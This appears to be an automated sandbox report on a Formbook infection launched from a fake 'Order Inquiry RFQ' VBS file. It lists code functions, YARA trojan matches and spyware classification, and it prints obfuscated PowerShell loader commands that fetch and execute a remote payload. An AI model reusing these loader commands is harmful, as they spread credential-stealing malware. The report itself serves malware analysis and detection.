          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2197EA8010_2_2197EA80
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219C5AA010_2_219C5AA0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A2DAC610_2_21A2DAC6
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A37A4610_2_21A37A46
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A3FA4910_2_21A3FA49
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F3A6C10_2_219F3A6C
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21998DBF10_2_21998DBF
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199FDC010_2_2199FDC0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2197ADE010_2_2197ADE0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2198AD0010_2_2198AD00
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A37D7310_2_21A37D73
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21983D4010_2_21983D40
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A31D5A10_2_21A31D5A
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A20CB510_2_21A20CB5
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A3FCF210_2_21A3FCF2
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21970CF210_2_21970CF2
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21980C0010_2_21980C00
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F9C3210_2_219F9C32
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21981F9210_2_21981F92
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A3FFB110_2_21A3FFB1
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21972FC810_2_21972FC8
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A3FF0910_2_21A3FF09
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219A0F3010_2_219A0F30
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219C2F2810_2_219C2F28
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F4F4010_2_219F4F40
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21992E9010_2_21992E90
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21989EB010_2_21989EB0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A3CE9310_2_21A3CE93
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A3EEDB10_2_21A3EEDB
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A3EE2610_2_21A3EE26
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21980E5910_2_21980E59
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeCode function: 11_2_03A5DBC211_2_03A5DBC2
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeCode function: 11_2_03A6432211_2_03A64322
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeCode function: 11_2_03A5D9A211_2_03A5D9A2
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeCode function: 11_2_03A5D99D11_2_03A5D99D
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeCode function: 11_2_03A6614211_2_03A66142
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeCode function: 11_2_03A7C83211_2_03A7C832
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeCode function: 11_2_03A5BC4211_2_03A5BC42
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02EB12ED12_2_02EB12ED
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E2D2F012_2_02E2D2F0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E2B2C012_2_02E2B2C0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E902C012_2_02E902C0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E152A012_2_02E152A0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02EB027412_2_02EB0274
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02ED03E612_2_02ED03E6
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E1E3F012_2_02E1E3F0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02DFD34C12_2_02DFD34C
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02ECA35212_2_02ECA352
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02EC132D12_2_02EC132D
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02EC70E912_2_02EC70E9
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02ECF0E012_2_02ECF0E0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E170C012_2_02E170C0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02EBF0CC12_2_02EBF0CC
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02EC81CC12_2_02EC81CC
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02ED01AA12_2_02ED01AA
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E1B1B012_2_02E1B1B0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02EDB16B12_2_02EDB16B
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E4516C12_2_02E4516C
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02DFF17212_2_02DFF172
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E9815812_2_02E98158
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E0010012_2_02E00100
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02EAA11812_2_02EAA118
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E2C6E012_2_02E2C6E0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02EC16CC12_2_02EC16CC
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E0C7C012_2_02E0C7C0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02ECF7B012_2_02ECF7B0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E1077012_2_02E10770
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E3475012_2_02E34750
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02EBE4F612_2_02EBE4F6
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E0146012_2_02E01460
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02EC244612_2_02EC2446
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02ECF43F12_2_02ECF43F
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02EAD5B012_2_02EAD5B0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02ED059112_2_02ED0591
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02EC757112_2_02EC7571
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E1053512_2_02E10535
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02EBDAC612_2_02EBDAC6
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E55AA012_2_02E55AA0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02EADAAC12_2_02EADAAC
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E0EA8012_2_02E0EA80
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E83A6C12_2_02E83A6C
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02ECFA4912_2_02ECFA49
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02EC7A4612_2_02EC7A46
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E85BF012_2_02E85BF0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E4DBF912_2_02E4DBF9
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E2FB8012_2_02E2FB80
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02ECFB7612_2_02ECFB76
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02ECAB4012_2_02ECAB40
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E138E012_2_02E138E0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E3E8F012_2_02E3E8F0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02DF68B812_2_02DF68B8
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E1284012_2_02E12840
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E1A84012_2_02E1A840
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E7D80012_2_02E7D800
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E129A012_2_02E129A0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02EDA9A612_2_02EDA9A6
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E2696212_2_02E26962
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E1995012_2_02E19950
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E2B95012_2_02E2B950
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02ECEEDB12_2_02ECEEDB
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E19EB012_2_02E19EB0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E22E9012_2_02E22E90
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02ECCE9312_2_02ECCE93
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E10E5912_2_02E10E59
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02ECEE2612_2_02ECEE26
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E02FC812_2_02E02FC8
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E8EFA012_2_02E8EFA0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02ECFFB112_2_02ECFFB1
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E11F9212_2_02E11F92
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E84F4012_2_02E84F40
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E52F2812_2_02E52F28
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E30F3012_2_02E30F30
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E00CF212_2_02E00CF2
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02ECFCF212_2_02ECFCF2
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02EB0CB512_2_02EB0CB5
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E89C3212_2_02E89C32
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E10C0012_2_02E10C00
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E0ADE012_2_02E0ADE0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E2FDC012_2_02E2FDC0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E28DBF12_2_02E28DBF
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02EC7D7312_2_02EC7D73
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E13D4012_2_02E13D40
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02EC1D5A12_2_02EC1D5A
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E1AD0012_2_02E1AD00
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_003A196012_2_003A1960
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_003A31D012_2_003A31D0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_003BB6E012_2_003BB6E0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_0039C85012_2_0039C850
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_0039C84B12_2_0039C84B
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_0039CA7012_2_0039CA70
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_0039AAF012_2_0039AAF0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_003A4FF012_2_003A4FF0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02C2038C12_2_02C2038C
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02C2E30312_2_02C2E303
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02C2E1E412_2_02C2E1E4
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02C2E69C12_2_02C2E69C
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02C2D70812_2_02C2D708
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02C2C9B312_2_02C2C9B3
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: String function: 02DFB970 appears 247 times
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: String function: 02E45130 appears 36 times
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: String function: 02E8F290 appears 103 times
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: String function: 02E7EA12 appears 86 times
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: String function: 02E57E54 appears 93 times
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: String function: 2196B970 appears 248 times
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: String function: 219FF290 appears 103 times
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: String function: 219B5130 appears 36 times
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: String function: 219C7E54 appears 85 times
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: String function: 219EEA12 appears 84 times
          Source: Order Inquiry RFQ #278823_pdf.vbsInitial sample: Strings found which are bigger than 50
          Source: 0000000C.00000002.2981736437.0000000000940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000E.00000002.2981468701.0000000001200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000C.00000002.2981799081.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000A.00000002.2447450866.0000000022690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000A.00000002.2446978661.00000000216E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@20/8@6/5
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Ildprve.FokJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v45leudp.4xr.ps1Jump to behavior
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Inquiry RFQ #278823_pdf.vbs"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7512
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7944
          Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: ktmutil.exe, 0000000C.00000003.2613458504.0000000000898000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 0000000C.00000002.2980525001.0000000000898000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Inquiry RFQ #278823_pdf.vbs"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Debrief klargoeringstekniker overmortgaged Kernefrugterne chewers underrealises #>;$Nethes='Regreskravenes';<#hertugdoemmer Accessionernes Vitaminisering senvy #>;$Hawse=$host.PrivateData;If ($Hawse) {$Justerkammer++;}function Bisulc($supernumerary){$Frstestyrmand=$supernumerary.Length-$Justerkammer;for( $Entremess=3;$Entremess -lt $Frstestyrmand;$Entremess+=4){$Bar+=$supernumerary[$Entremess];}$Bar;}function Brdnidens($Naturaliseredes){ .($spectrographic) ($Naturaliseredes);}$Brnehospitalerne=Bisulc 'LocMDraoBrnz Tji M,l Fal la T /Ga,5Tan. f0Bog Vea(PilWDi iselnv ndD mo,alwslassta stNsanT To gro1Ov 0,et.Fac0Ov ;.to NonWCuri atnUnd6N,c4 Ch; ci ArbxUd,6For4Kn,;she HarNonv Fa:Non1N,n2fla1Mar.Naz0H m),ul MaG Cae axc nok H.oOps/ Ac2 lo0Teg1 uk0N n0slh1Vir0 Bo1hum stuF koiU tr kePelf .uo caxEw./ e1Bar2bol1Lan.pol0s,n ';$Paplike=Bisulc 'EndU epsH,uEs.bRshr-DepANa g K eAlgNN at Al ';$Overconfidences=Bisulc 'equhBultElstKiupsyssfra: .o/J.h/ sodK.nrBrni mav oeIsl.selgDemo A.ori,gKillsabeUnc. CacLsbo MumThe/Hu.u omcE g?ArbeHeixbilpDecoHemrUndtBla= ChdsnioFulwIndn uplTagoCema,oidDid&BaiiB uddom= .e1cyc-HarMIn 5FerLFu z UnL,ollsp,VTh hLaag Brmsam9End2 Re1KorZTigw selZe uNav8 arI ArQ.if3Te w.atK PrOHo u DiCMi 8innUWhi8ConqCornsal ';$Corbovinum=Bisulc ' sp>Tai ';$spectrographic=Bisulc 'suci NoE VeXpel ';$accretive='Aphanozygous';$Tilvrelsens = Bisulc '.useB nc Fohe nosc Gli%rimaUfop P.p.irdPelaY.ut rea il% ul\ ,oIHa.lBaadH rp A r onvHisePal. ppFThuoForkUn. Tr&Tvr& P Cue RucIndh.ncoTa. Fartink ';Brdnidens (Bisulc 'Uin$Vocg lvlMedoOscb raAx ls,i:AliR rivUdle empAffeFl,lcirsskoe PonMare re=Gru( rc P.msupd U. Ind/UndcUnd He $BilT BriProlBenvKalrdryeL,nlTetsupae klnMetsIsd)Din ');Brdnidens (Bisulc 'Int$geogDoklDe oskrbPr as ml Dr:,nhL IngHeteTr dDesoskimConms de C npatsB.r= Co$FryOAervDreeVanrConcKeloNonnAnafTr,iTvidCateTownGuacRuseUngsI.d.stas.urp bol Peic stPhy(War$st.CConoTelrsambBr oskuvTakiCurn houNonmPer)sce ');Brdnidens (Bisulc 'Ple[parN.ide,iltDek. ens sue Anr TevCriidolc BaeforPfiro Uaisemn Trt .mM Mia onnForasubg FleHalr in]Ir : U :BlisResePhoc stucirrBesiGrntWhuyIncP.inr Ego PatAf.oTrvcUn,oEnelEnt .at= Tu G [PelNCr,eslatArm. PosBa eG ocMa uArbrDo iscutBefysprPVelr C ostytDisos rcslaostil aaT atyEmipaxse Wa] Re:Dry:I.mTAl.lsessNe 1Pas2 .l ');$Overconfidences=$Lgedommens[0];$Continuums= (Bisulc ' wi$CepG DuL aroBagBNonA alL,em: CaMC laKn c H,RBliOEliRBruhse iUafNHjsUEugs o2Wi,1Fo,8o s=Moun Ave HyWM d- dfo KabPreJ.hoeBanCMexTIm EnrsDu yGevssipt U e ,uMOce.FolnMacE P T Un.BajwKylEE sBC lCD.dLOmdiUrbE ExNDa T');$Continuums+=$Rvepelsene[1];Brdnidens ($Continuums);Brdnidens (Bisulc 'cal$O aMAn a pcPlar Beo ntrDivhCroiPernsocuD ssB,r2 e1 Pl8 Os.sikHVe,e TraPupdKo eBearCtesRat[ Ec$InsPRa,aHygpLoblHaeiLolk GueO e]Tru=Uaf$Ut B s.rskrnsele H hKo oVers grpForiMant FraVillO.seMi rH.inPlaeMis ');$Kardinalen=Bisulc 'C,r$GruMClaaModc
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ildprve.Fok && echo t"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Debrief klargoeringstekniker overmortgaged Kernefrugterne chewers underrealises #>;$Nethes='Regreskravenes';<#hertugdoemmer Accessionernes Vitaminisering senvy #>;$Hawse=$host.PrivateData;If ($Hawse) {$Justerkammer++;}function Bisulc($supernumerary){$Frstestyrmand=$supernumerary.Length-$Justerkammer;for( $Entremess=3;$Entremess -lt $Frstestyrmand;$Entremess+=4){$Bar+=$supernumerary[$Entremess];}$Bar;}function Brdnidens($Naturaliseredes){ .($spectrographic) ($Naturaliseredes);}$Brnehospitalerne=Bisulc 'LocMDraoBrnz Tji M,l Fal la T /Ga,5Tan. f0Bog Vea(PilWDi iselnv ndD mo,alwslassta stNsanT To gro1Ov 0,et.Fac0Ov ;.to NonWCuri atnUnd6N,c4 Ch; ci ArbxUd,6For4Kn,;she HarNonv Fa:Non1N,n2fla1Mar.Naz0H m),ul MaG Cae axc nok H.oOps/ Ac2 lo0Teg1 uk0N n0slh1Vir0 Bo1hum stuF koiU tr kePelf .uo caxEw./ e1Bar2bol1Lan.pol0s,n ';$Paplike=Bisulc 'EndU epsH,uEs.bRshr-DepANa g K eAlgNN at Al ';$Overconfidences=Bisulc 'equhBultElstKiupsyssfra: .o/J.h/ sodK.nrBrni mav oeIsl.selgDemo A.ori,gKillsabeUnc. CacLsbo MumThe/Hu.u omcE g?ArbeHeixbilpDecoHemrUndtBla= ChdsnioFulwIndn uplTagoCema,oidDid&BaiiB uddom= .e1cyc-HarMIn 5FerLFu z UnL,ollsp,VTh hLaag Brmsam9End2 Re1KorZTigw selZe uNav8 arI ArQ.if3Te w.atK PrOHo u DiCMi 8innUWhi8ConqCornsal ';$Corbovinum=Bisulc ' sp>Tai ';$spectrographic=Bisulc 'suci NoE VeXpel ';$accretive='Aphanozygous';$Tilvrelsens = Bisulc '.useB nc Fohe nosc Gli%rimaUfop P.p.irdPelaY.ut rea il% ul\ ,oIHa.lBaadH rp A r onvHisePal. ppFThuoForkUn. Tr&Tvr& P Cue RucIndh.ncoTa. Fartink ';Brdnidens (Bisulc 'Uin$Vocg lvlMedoOscb raAx ls,i:AliR rivUdle empAffeFl,lcirsskoe PonMare re=Gru( rc P.msupd U. Ind/UndcUnd He $BilT BriProlBenvKalrdryeL,nlTetsupae klnMetsIsd)Din ');Brdnidens (Bisulc 'Int$geogDoklDe oskrbPr as ml Dr:,nhL IngHeteTr dDesoskimConms de C npatsB.r= Co$FryOAervDreeVanrConcKeloNonnAnafTr,iTvidCateTownGuacRuseUngsI.d.stas.urp bol Peic stPhy(War$st.CConoTelrsambBr oskuvTakiCurn houNonmPer)sce ');Brdnidens (Bisulc 'Ple[parN.ide,iltDek. ens sue Anr TevCriidolc BaeforPfiro Uaisemn Trt .mM Mia onnForasubg FleHalr 